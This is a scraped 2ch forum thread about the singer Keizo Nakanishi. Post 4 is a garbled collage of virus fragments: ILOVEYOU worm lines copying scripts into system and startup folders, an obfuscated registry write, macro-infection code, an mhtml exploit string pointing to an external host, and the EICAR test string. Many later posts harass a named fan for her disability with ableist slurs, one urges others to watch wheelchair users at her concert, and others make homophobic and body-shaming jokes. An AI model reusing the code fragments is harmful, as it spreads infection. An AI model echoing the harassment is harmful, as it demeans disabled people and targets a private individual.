1read 100read
【もう少し】中西圭三【時間を下さい・・・】 (393) TOP カテ一覧 スレ一覧 2ch元 削除依頼
MAMALAID RAG 5 (168)
      工藤慎太郎       (334)
MAMALAID RAG 5 (168)
□□□ 小沢健二 105 □□□ (162)
ソロ歌手としてのデーモン小暮 (316)
織田裕二 (284)

【もう少し】中西圭三【時間を下さい・・・】


1 :2006/08/13 〜 最終レス :2013/10/22
公式サイト
ttp://www.keizo.jp/

2 :
YOU&Iが好きだった

3 :
携帯公式サイト
http://mediand.jp/keizo

4 :
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

5 :
>3
動画や音声が充実してますね

6 :
>>5
せめてもの「誠意」なんじゃないのかと・・・
豚の時間感覚は「少し」が5年10年単位ですからw

7 :
>>5
本当だ。
いろんなアーティストのサイトをチェックしてるけど、
これほど無料ダウンロードが充実してる携帯サイトは異例。
普通は試聴ならちょっとしか聴けないのにまるまる一曲聴けたりするのも珍しい。

8 :
夏メロ邦楽にスレが出来てるからこっちはいらないよ。

9 :
>>1
過去ログ
中西圭三ファソでてこいや http://makimo.to/2ch/tv3_musicj/1041/1041052142.html
中西圭三 スレッ! http://makimo.to/2ch/ex5_musicj/1077/1077003004.html

氷角BBS
ttp://hpcgi1.nifty.com/icecube/yondemi/res.cgi

10 :
>>10
THX!
明後日の横浜って売り切れたの?

11 :
ファンクラブに入ると優先予約あるそうですが、どの位の優先枠でしょうか?

12 :
▼▲▼処分された医師の実名を晒すスレ▲▼▲
http://society3.2ch.net/test/read.cgi/hosp/1155731818/l50

13 :
http://brokenmemory.blog21.fc2.com/

14 :
>>10 完売らしい

15 :
MTVで観たけどこの人歌上手いね〜

16 :
そうだよ、声と歌はほんとイイ!大好き。
でもたまには・・・3年に1曲でいいから新しい曲聞かせてくれないと欲求不満になっちゃうよ。
今新しい曲サイトから聞けるから飽きるほど聞いてるけど、それなかった時は気が狂いそうだったもん。
今日の横浜行かなかったけど行った人羨ましい。チョンマゲ豚→ぽちゃカワになってたしwデブでもあれなら許すw
氷角えこひいきがなければ問題なく好きなんだけどなあ・・・貞子@名古屋や櫻島大根@西川口なんかスルーでいいんだけど氷角軍団の席順や位置が気に入らないんだよねぇ。
行った人、今日も氷角軍団は最前列に居ましたか?!

17 :
みゆきってウザくない?
氷角掲示板でも浮いてるよ。

18 :

心の病気かアスペルガーと思われ。
さわらぬ神に祟りなしw

19 :
みゆきって自分が行けなかったライブの様子を知りたがって≪誰か報告して!≫って頼む癖して、それの答えに対して全然、お礼というか感謝のレスを返さないんだよね。
心の病とかアスペ云々より、人としての常識の無さや育ちの悪さを感じるよ。

20 :
だって、メンヘル(精神病=心療内科・精神科・神経科の患者)って頭のおかしい人なんでしょ。
そういう病気なんだからしょうがないじゃん。
腹を立てるってことはおかしい人を真人間として扱ってることになるよ。
身障チャンのことを真人間として扱わないでしょ?だからみゆきも人間扱いしなくて桶。
メンヘルって自分のことばっかしか考えないし違う考えや冷静な意見言ったら逆ギレするから手に負えない。
精神疾患のある人間と身障と餓鬼は出禁にすればいいのに。ってか、それプラスブス禁にしたらファンや客数える位しかいなそうw

21 :
本当に基地外・身障・餓鬼・デブス・ヲタは入場禁止にしてほしい、それから独特
のセンスの悪趣味な服を着てくる奴もね、会場で同じ空気吸ってるだけで不愉快
になるから。
ただでさえ他のメジャーアーティストに比べてチケットが不当に割高なのに…
バラードの時に奇声でも発せられた日にぁ迷惑料を請求したくなるよ(実際、過
去にそれでモメたんだろ)。

22 :
障害者って小さい時から特別扱いしてもらって、大人になっても周りの人が手助けしてくれるから、
常に自分が最優先で優遇されるのが当たり前だと思ってるんだよね。
誰かに忠告されても、注意する人は障害者を差別してる奴だと思い込んでいるから聞く耳ももたな
いし。
近所に小児麻痺と軽い知障の女の子が住んでたんだけど、その子が迷子になって帰ってこないって
ことが時々あって、そのたび女の子の母親が「○○ちゃんを探せ!」と指令を出してきて、勿論、
皆で協力して探すんだけど、「うちの子はハンディがあるんだから周りが協力してあたりまえ」と
いう態度だし、見つかってもお礼ひとつ言ってこなかった。
別にお礼を言われたくて探すのに協力してるわけではないけど、誰も口には出さなかったけど嫌な
気分になったもんです。
みゆきの書き込みにもそういう内容のものがあったよね。

23 :
>>21
いや、それ全部出禁にしたら8割方が出禁だからw
>>22
みゆきの書き込みにはまさにソレが見え隠れしてたね。すごい自己中でヒキヲタ管理人がちょっと可哀想になったよ。

24 :
携帯サイト→ファンクラブスを見たら、年末にまたハワイカウントダウンツアー(通称:痛いファンからぼったくるツアー、去年は代金40万+オプション別料金だった)やるらしい。
やはり根性は変わらないってやつですかw

25 :
久々に聞いたら励ますような歌詞が結構あっていいね
でも圭三は作曲中心で作詞は他の人なんだね
自分の昔の歌を聞いてがんばってほしいね

26 :
又、ぼったくりイベントやるんですか!申し訳程度の仕事しかしてない癖して
図々しいにも程がありますね。
元来、FCイベントってのは日頃、応援してる人達に感謝の意味で開催されるも
のなのでは?
会場費程度の金額しかとらない良心的なアーティスト(凄く売れてる人です)
だって居るのに…
こんなんだからまともなファンは皆、去っていってヒキヲタとかメンヘルとか
高齢処女とか障害者しか残らないんですよ。
又、こういう事を書くとヲタが必死になって「君は悲しい人だ」なんて論点が
外れた攻撃してくるだろうけど、誰が聞いてもこっちの方が正論なんだから!
つまんない能書きを考えてる暇があったらきちんと仕事して下さいな。

27 :
そんなの大枚はたいて行く馬鹿が居るから駄目なんだよ。
ぼったくりツアーはKダッシュ時代からの悪習だね、それでローン地獄に陥った
Rず後家のデブスを知ってるよ、どうせ今回も借金して参加だろうね。

28 :
光太郎=みゆき?

29 :
10/1にファンクラブスで岡山ツアーあるみたいね。メルマガでしか配信してないみたいで詳細は分からないんだけど…。
前にメールとか会員情報に書いたはずなんだけど、デブゴリラがなくしたのかな?メルマガうざそうで登録してないんだけど登録しなきゃダメなのかなぁ。
明日から手術の為入院するからデブゴリラでも聴いてすごそうかな。
10/1のは幾らで何するの?

30 :
こんばんは、高橋圭三です

31 :
>>30
どうもどうも

32 :
池田聡のスレってないのでしょうか。

33 :
相変わらずキモイ…
いってきました〜
■みゆき(564) 投稿日:2006年9月23日<土>18時56分/女性
さなさんとたっくんとうちのよしくんと四人で…たださなさんのアクシデントで私もイオンで歩いていたら股関節痛がでて。
さなさんと同じ車椅子を借りて…。
朝 七時半から並び整理券をとり。
やはり車椅子ということで最優先して頂き一列めでライブをみることができました。
琵琶湖依頼でなんかすごく感激しました。
たまたまCDをかいサイン握手会がありました。
圭三さんに携帯電話にサインよしくんは帽子に…さなさんは2ショットを…嬉しかったです〜。
親しみ感がわいて話もはずみました。
また 会えるときを楽しみにしています。
圭三さんにサインもらってるとき唇が震えてました。
また来てくださいね。
と圭三さん やさしいんですよ(^O^)また 会える日を楽しみにしています。

34 :
圭三さん私のこと覚えていてくれていました。
■みゆき(566) 投稿日:2006年9月24日<日>09時54分/女性
今年のチボリは杖を持参していました。チボリもそうですが待ち時間があると結構苦痛なんですよ。
さなさんは膝を脱臼して車椅子になりました。
私は生まれつき股関節のかかり具合いが浅くあと10年日常生活しだいで人工関節になりうる可能性
をしてきされて。
見た目には私はわからないんですよ。
私は当分は杖を活用し 歩けなくなったら人工関節にしてなるべく車椅子は避けたいと…こればかりは。
もつも持たすも自分しだいということかも。
今後 イベントにいくとき ご迷惑をかけると思いますが。m(__)m すいません。

↑読んでるだけでうざいわ〜
カマッテ臭がするというかなんというか

35 :
てのひらいいね

36 :
>>34>>35さんくす!
空気嫁っていいたくなるよね…。みらいよりやばいよこいつ。
みゆきといい身障タソといい、身障特権生かしまくりなのが卑しい。

37 :
氷角掲示板で ふりうりとかいう奴のみゆきに対するレスが笑える。
みゆきの事を気遣ってるようで、実際は皮肉たっぷりなんだもんw

38 :
>>37 PC修理中で見れない私にコピぺして〜!

39 :
今、桃三郎見てきた、ふりうり笑わせてくれるな。
お大事にしてくださいね。なんて書きながらチクリと皮肉ってるじゃん。

40 :
しゃきーん
ぱわわっぷ

41 :
保守

42 :

中西ゲイ三


43 :


44 :
既女板からコピペ
139 :可愛い奥様:2006/10/26(木) 00:25:19 ID:hR5bvLUd
ピンクハウスは昔はヤンキーに人気あったよ。
似合いそうな人に限ってきないで、にあわないような人が好んできてた。
ピンクハウス=ヤンキーが好きてイメージがある。
私も嫌いだな、あの服。

140 :可愛い奥様:2006/10/26(木) 00:26:21 ID:NKw6wJ/a
>>137
トンクス。
確かに自分の美的感性を反映した服が
そぐわない人に着られるのは
作り手として我慢がならないでしょうね。

141 :可愛い奥様:2006/10/26(木) 00:29:38 ID:SmwVVD6S
ピンクハウスは何故か
デザイナーが一番望んでなかった人にしか人気なかったよね。
デブかブス。
モデルさんが着ていると本当に綺麗なのに。

142 :135:2006/10/26(木) 00:34:27 ID:zpO68z0j
ピンクハウスは安い素材(木綿)に韓国で縫製させてる癖して、ぼったくりに近い高額
だから、着てる奴は皆、借金まみれですよ。
余裕で買えるようなお金持ちはあんなヤクザなブラントの服には固執しませんからねw

45 :

>デブかブス
奴はデブで且つブスだから最強だねw
奴が着てるとピンクハウスも土偶にしか見えない。

46 :
>デブかブス
ついでに借金まみれw

47 :
40歳越えてピンクハウス系って絶対メンヘルだと思う。

48 :
>>47
禿同。
ピンクハウスマニア(金子功信者)の人って 容姿の美醜に関わらずメンヘル
が多い気がする。
幼女的、少女的な可愛らしさに固執して 「いつまでも少女の心を失わぬ自分」
を誇示するのに心血と金銭を注いでる感じ。
でも、実際に正体を晒すと西川口みたいに狡猾で自己中で直情的に他人に暴力
ふるったりするんですよね 。

49 :
チラシの裏だけど…
ピンクハウスの金子功って昔はブスには自分の服を売らないって有名だったのに、ここ数年は西川口とか宮川花子みたいな
デブスしか客が居ないじゃん。

50 :
かなり前にピンクハウスにVHS貸して、借りパクされた。
金に限らず、「貸した方が悪い」「嫌な思いをする」のが殆ど 。
美輪明宏が身の上相談でで言ってた【金は貸したらあげたと思え】に頷けるけ
ど、品物まではそうは思えない。
「すぐ返すから!」という言葉を信じて、貸したにも関わらず奴はその好意を
当然と思い込み返済を迫ると逆切れされた。
私が奴の正体を知らなかったのがいけないけど、なんか悲しい…これも美輪
明宏の言葉だけど【人間関係において、金品の貸し借りは絶対にNG】。

51 :

デブスマン


52 :
DQNの四天王
ピンクハウス、貞子、身障チャソ、みゆき

53 :
DQNパラダイスw

54 :
この2人には、もう言うべき言葉も見当たらない。
ほんと、お好きなだけラブラブしててくれって感じだ。
なにしろ、さとちゃんと中西は大学の先輩後輩で、中西はデビュー前、さ
とちゃんのバックコーラスを担当してて……当時のライブビデオでは、中
西の担当パート前に、さとちゃんの「圭三!」と言う声が入っている。
今はすっかり中西に追い抜かれちゃった感じで、さとちゃんを知ってる人
自体信じられないくらい少なくなっちゃったんだけど。
さとちゃんは『濡れた髪のlonely…』でレコ大候補にもなったんだぞーー!
……ま、候補になっただけだけど…(苦笑)
そんなことはどうでも良くてーーー! 本題はこの2人のラブラブ振りなの
だーー!
とにかく、仲がいい。それも初恋同士のような照れ臭そうな仲の良さ。
十数年ものつきあいだろうに、30過ぎの男2人が(しかも片方は×イチ…)
一緒にいると、ほんと、見てるこっちが照れちゃうくらいの雰囲気。
桐原なんてすっかり忘れちゃってる初々しさなんだよねーー。
ありゃ、一生やってるね。あのままだね。
相手がいないときは憎まれ口(?)みたいなことも言ってるのに。
多分、お互いに相当好きなんだと思う。誰も邪魔できないラブラブファイヤ
ー振り。
他の人と喋ってるときは照れ臭そうな感じがないからねーーー。
ICEBOX当時、『ミュージックステーション』に出たときが特に凄かった。
いじっちーもさとちゃん好きっぽかったけど、2人は「池田さん」「圭三」と呼
び合いラブラブファイヤー!
さとちゃんが結構、小悪魔入ってるんだよねぇ。
ゲイの人たちに「歌ってるときがすっごく色っぽい」と力説されただけに、二
枚目じゃないじけど色っぽいし。いじっちーも参っていたんだろうと思う。
紅一点・忍ちゃんも男どもの様子に呆れてる感じだったから。
ICEBOXの頃は、プロデューサー・某A氏(限りなく実名に近い伏字)ともな
んかヤバイ感じあったし。
その昔、さとちゃんはアレンジャーS氏とも……×××××…
桐原は、中西が離婚したのには、さとちゃんの存在も結構あったと思ってる。
高樹沙耶じゃ物足りなかったんじゃないかな。さとちゃんの存在の大きさの
前ではねぇー
ま、今後はカモフラージュ婚(勝手に決めている…)なんぞせずに愛に生き
て欲しいですな。2人とも。くすっ。
↑貞子も真っ青のすげー妄想だなw 圭三のファンってこんな奴ばかりなの?

55 :
>>54にあるのを書いたヤツは隔離しないとヤバイだろ
統合失調症とかじゃねーの?

56 :
コピペパラダイス

57 :
キモい

58 :
>>55
隔離しなきゃいけない奴は他にも沢山いるよ。
ディナーショーでバラード歌ってる時にカン高い声で一緒にハモった婆とか、
ライブ会場のロビーでキモメガネの癖して周りに女(ブスばかり)はべらして
ワザと声高に自分がいかに圭三&そのスタッフと話すニート野郎とか…
>>54 は圭三ファソじゃなくて池田聡ファソっぽいな…
腐女子的な妄想は自分の頭の中だけでやっておくれ。

59 :
ゲイ三ファンには異常者が多いんですね

60 :
中西圭三、ちっゲイとパラダイス。Ticket to Paradise

61 :
DQNおばさんの書き込み
■ こんにちは…テ
■みゆき(584) 投稿日:2006年11月7日<火>20時05分/女性
11月12日 広島三次にてダムの竣工記念ライブにさなさんとたっくんと私とよしくんと行きます。
ただ車椅子なんで…私は手術前だけど筋力を落とせないため松葉杖なんですが。
12日は二台の車椅子で行きます。全席自由席なんで…。
あと数日で圭三さんの誕生日ですね。11日にはたっくんも6歳になります。
たっくん圭三さんと誕生日も血液型も同じで偶然で イベントのときは よくみてもらってます。
よしくんも最近デビューしました。ただよしくんは恥ずかしがりやなんでなかなか…。
いかれるかた 楽しみましょうね
>ただ車椅子なんで…私は手術前だけど筋力を落とせないため松葉杖なんですが。
>12日は二台の車椅子で行きます。全席自由席なんで…。
相変わらずですね。又、身体障害者特権をフルに使う気なんだろうね、意地汚いにも程があるよ。
当日は車椅子で来ている子連れをチェックしましょう!

62 :
本人が特定される書き込みを誰が見てるかも解らないネット上にするなんんて
このおばさんってマジで知障?
『いかれるかた 楽しみましょうね』なんて言ってるけど、自分だけが楽しむ
事しか考えてないよね。
知障おばさんに連れ回される子供が一番の被害者だね。
西川口、貞子、身障チャソ共々、絶対に係わり合いになりたくない人種だ。

63 :
みゆきって教えてチャソで答えが気に食わないと
逆切れや不幸語りを始めたり、返される答えに満足せず、
延々と質問し続ける。
自分が掲示板の雰囲気を悪くしてるという自覚が全然ない。
メンヘルボダなのかな?気持ち悪くて読んでるだけで嫌。

64 :
なんか知らんが
粘着アーティストに粘着なファンばっか
寄り道して損した

65 :
>>60 中西圭三、ちっゲイとパラダイス。Ticket to Paradise
脱帽っす!
でもいつからゲイ三ってゲイキャラになったんだろうねぇ?

66 :
私も12日の行きますよ。
楽しみです(^O^)/

67 :
ダムに何人集まるんだろうな(謎

68 :
10数年位前、この人と追っかけらしき3人組を見た。(仙台駅で)
何がびっくりしたって、追っかけのブサイクぶりにビビった(゚Д゚;)
ピンクハウスにソバージュ頭の人が、私が生きてきた中で
最強にブサかったのを覚えてる。
当時私も別アーの追っかけをしてて、ブサが多くて有名なアーだったけど
そいつら位ブサイクな追っかけはいなかった。マジで衝撃的だった。

69 :
で、ダムに何人集まった?
ひょっとしてカラオケダムの間違いとかじゃないよね?(爆

70 :
………
最近…私 圭三さんの…
■みゆき(591) 投稿日:2006年11月18日<土>11時31分/女性
ストーカーだといわれちゃいました。
毎日ももさぶろう〜ファンクラブサイトにアクセスしてライブ確認とかして。
だからすでに 来年関東のシーズンズのチケット四枚各所一枚で… 主催者から送付してもらったけど
FCでの割引優先があるとわかり…おっちょこちょいです。年内には股関節両足手術をして来年復活
1月13日〜いきます 月1しかいけないけど3月のみ10 11と。それを支えに手術頑張ります〜。
私 圭三さんのライブに行きたいだけです。
ストーカーではないです。
私 やはりストーカーなんでしょうか?圭三さんには嫌われたくないから。

71 :
変なブログの転載すな、ボケ

72 :
多分↓ココのBBSを転載してるんでしょう。
http://hpcgi1.nifty.com/icecube/yondemi/res.cgi

73 :
中西圭三、「ケツ借そう(結晶)」リリース。
     

74 :


75 :


76 :
みゆきって何で改行しないの?
すげー読みにくいよ。

77 :
>>76 読む気があるだけキミは凄いな

78 :
相変わらず、デパートの催し物とか祭りの余興の仕事しかないんだなw

79 :
どなたか詳しい方、教えてください。
「HAPPY EVER AFTER」
のシングルの写真、圭三さんがつけている時計は
ロレックスエクスプローラですか?

80 :
悪人ヅラ
ttp://img.blogs.yahoo.co.jp/ybi/1/96/b1/capital_village/folder/254805/img_254805_24622695_0?20061201133115

81 :
あらーまだ細かった頃じゃないのー。
今は見る影もないけどw

82 :
中西って、高木なんたらと結婚してから、坂道を転げるように落ちていったね
高木なんたらっていうのが、下げマンだったのかな

83 :
さげまんなんじゃなくて、多分
中西自体がドアホだったんだよ。
きっとね・・・。

84 :
ヘタレ豚象age

85 :
まじで誰と結婚したんだっけ?

86 :
沙耶のいる部屋

87 :
エコライブ観に行く人いる?

88 :
エコライブ仙台観に行く人いないのかな?

89 :
エコライブ行ったよ。みんなコイツ誰?的な空気だったけど

90 :
少しは痩せたか?
ゲイゾウ?

91 :
高樹沙耶と結婚してから人気が無くなって、離婚→引きこもりで過去の人。

92 :
時代の流れを感じるな。
http://www.youtube.com/watch?v=dIyMOadzOA0

93 :
米倉利紀と「どっちがファンキーか」で喧嘩したんだよな。

94 :
デビュー記念日だから来てみたら閑散としてますね。
>>93
レーベルが一緒の頃は「子供作りました」なんていってた癖にw
所詮おネエ同士だからうまくいかなかったのでは?

95 :
老害ヲタファンしか居ない奴のスレが賑う訳ねーだろw
圭三自身が一番の老害なんだけどなw

96 :
老害・・・

97 :
老害age

98 :
中西圭三さんが乗ってるクラシックカー分かる方教えて下さいm(_ _)m

99 :
高木沙耶と何発かやれたんだからもういいだろ

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
三浦大知 Chapter.73 (299)
【まさかの】冨田ラボ vol.1【オリコン11位】 (118)
ムーディー勝山 (216)
布施明 (177)
木暮"SHAKE"武彦(元REBECCA、RED WARRIORS等) (825)
前野健太 part1 (159)
--log9.info------------------
▽30女のパンティ>女子高生のパンツ▽A (858)
30代もジョギング (325)
【勝負】不覚にもワロタと言わせてやる【第12戦!】 (391)
【迷惑】 元同級生という名の他人 【消えて】 (140)
中学生・高校生時代にブリーフ穿いていた人 Part2 (542)
【学部一般入試】30代で大学受験【再受験】 (953)
       南無不動明王 (237)
女子高生のミニスカートは禁止しろ。 (428)
☆ 30歳過ぎて派遣社員やってる男性 ☆ (482)
30代男でムダ毛処理してる奴 (238)
【Nゲージ】鉄道模型が好きな30代【プラレール】 (129)
30代の自殺志願者が集まるスレ (157)
30代なら結婚よりゴールドライタンやろ! (113)
おっさん世代がももいろクローバーZを語るスレ☆34 (885)
恋人なし30過ぎ独身同士でマターリオフ会 8 (258)
チェッカーズベスト30曲投票受付所 (175)
--log55.com------------------
NHK BSプレミアム 7955
連続テレビ小説「はね駒」(再)27
連続テレビ小説「エール」32
岩合光昭の世界ネコ歩き★678
NHK BS1 9662
BS日テレ 3787
BS12 TwellV 939
BS朝日 3872